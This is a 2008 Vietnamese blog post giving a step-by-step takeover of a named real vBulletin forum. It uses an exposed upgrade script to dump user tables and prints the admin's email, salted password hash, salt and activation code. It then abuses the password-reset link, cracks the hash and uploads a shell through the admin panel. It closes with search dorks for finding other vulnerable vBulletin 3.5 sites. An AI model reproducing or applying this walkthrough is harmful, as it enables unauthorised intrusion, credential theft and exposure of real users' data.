Jul 16, 2008
132 Views

Bug VBB ( lỗi dump file data )

Written by

bài của bongmaonlinehp
Link check bug: http://www.ecolink.com.vn/forum/install/upgrade_301.php?step=bongmaonlinehp
Cách khai thác:
+Reset pass Admin
+Crack pass đã reset ( pass hash)

Chui vào forum xem admin nó là thằng nào:
Biết phải làm gì rồi đấy
[hidepost] http://www.ecolink.com.vn/forum/member.php?u=1~~~~~> chẳng nhìn thấy cái j` cả hix hix, bít mỗi nickadmin là admin

Quay trở lại cái link check bug kia. Dump cái forum_user về ngắm thử cái.
Thấy được một vài info về thèng admin nè

Trích:INSERT INTO forum_user VALUES(‘1′,’2′,”,’0′,’Admin’,’2577b6ef6687621105a2f645109ce5e4′,’2006-04-28′,’[email protected]’,’0′,”,”,”,”,”,”,”,’2′,’2′,’Junior Member’,’0′,’1146211500′,’0′,’1171980120′,’1171984 020′,’1151399820′,’2′,’10’,’5′,’0′,’0′,’0′,’0′,’0′ ,’2135′,”,’0000-00-00′,’-1′,’1′,”,’0′,’0′,’0′,’0′,’-1′,’0′,’0′,’vuu’)

Thấy mail nó rồi, ti61n hành fogot pass của nó thôi
http://www.ecolink.com.vn/forum/login.php?do=lostpw
Điền cái mail nó vào
Xong rồi đợi nó gửi cái link active về mail thôi. Ủa mà mình đâu bít pass mail nó nhề

Quay về cái link check bug dump cái forum_useractivation về. Ở đây ta sẽ lấy được activation code. Để coi lại cái đã

Trích:INSERT INTO forum_useractivation VALUES(‘3′,’1′,’1171986142′,’62080582′,’1′,’2’)

Link active sau khi fogot pass gửi về mail của admin sẽ là:
http://www.ecolink.com.vn/forum/login.php?a=pwd&u=1&i=62080582
Muốn hiểu tại sao lại như vậy thì bạn thử fogot pass ở ngay forum này nè

Pass mới được tạo lưu ở trong forum_passwordhistory. Dump về rồi soi típ nhá.

INSERT INTO forum_passwordhistory VALUES(‘1′,’ce221dbe4df612053202152fc68fc875′,’2007-02-20’);
INSERT INTO forum_passwordhistory VALUES(‘1′,’3990cbe9c727d57e6d72bcd61bf9e8fe’,’2007-02-20′);

Cái trên là của mèo, cái dưới là của tớ (cái màu đỏ ý được gọi là j nhỉ ^^)

Passhash của forum VBB có dạng: hash = md5( md5( $password ) . $salt ) ( mã hóa 2 lần, mịa nó secu gớm !)

Bi giờ đi lấy Salt (Salt gồm 3 kí tự, được tạo ra trong lúc reg nick và không thay đổi theo lời gian ~~~> lão Miki nói vậy)

Trích:INSERT INTO forum_user VALUES(‘1′,’2′,”,’0′,’Admin’,’2577b6ef6687621105a 2f645109ce5e4′,’2006-04-28′,’[email protected]’,’0′,”,”,”,”,”,” ,”,’2′,’2′,’Junior Member’,’0′,’1146211500′,’0′,’1171980120′,’1171984 020′,’1151399820′,’2′,’10’,’5′,’0′,’0′,’0′,’0′,’0′ ,’2135′,”,’0000-00-00′,’-1′,’1′,”,’0′,’0′,’0′,’0′,’-1′,’0′,’0′,’vuu’)

User: Admin
Passhash: 3990cbe9c727d57e6d72bcd61bf9e8fe ( hiện tại là thế ^^)
Salt: vuu

Dùng Passwordpro để crack ra pass admin ( hỏi tớ passwordpro lấy ở đâu là tớ óanh á ). Vào Admincp, đẩy shell lên.

keywork
Powered by vbulletin 3.5*+bạn
Powered by vbulletin 3.5*+tôi
Powered by vbulletin 3.5*inurl:”com.vn”
Powered by vbulletin 3.5*inurl:”net.vn”
Powered by vbulletin 3.5*inurl:”.vn”
Powered by vbulletin 3.5*inurl:”.cn”
[/hidepost]

Article Tags:
· · ·
Article Categories:
Bug & Security
    http://linholiver.com

    https://linholiver.com/diary/about/